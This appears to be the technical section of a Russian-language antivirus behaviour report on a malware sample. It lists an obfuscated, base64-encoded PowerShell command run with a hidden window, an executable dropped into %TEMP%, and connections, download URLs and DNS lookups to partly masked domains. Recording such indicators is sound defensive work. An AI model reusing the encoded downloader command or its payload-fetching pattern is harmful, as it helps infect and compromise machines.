Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAcwBDAGAAUgBpAGAAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBjAHQAJwAsACcAZQB3AC0AbwBiAGoAZQAnACwAJwBuACcAKQAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAewAwAH0AewAyAH0AewAxAH...
- %TEMP%\37743.exe
- %TEMP%\37743.exe
- 'tw###anists.com':80
- 'ca###ary.com':80
- 'pt###ia.com.au':80
- 'pt###ia.com.au':443
- http://tw###anists.com/cebsr/
- http://ca###ary.com/roqoMi/
- http://pt###ia.com.au/RDxXqI/
- 'pt###ia.com.au':443
- DNS ASK se####poli.com.ar
- DNS ASK tw###anists.com
- DNS ASK ad###ssbd.com
- DNS ASK ca###ary.com
- DNS ASK pt###ia.com.au
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAcwBDAGAAUgBpAGAAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBjAHQAJwAsACcAZQB3AC0AbwBiAGoAZQAnACwAJwBuACcAKQAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAewAwAH0AewAyAH0AewAxAH...' (со скрытым окном)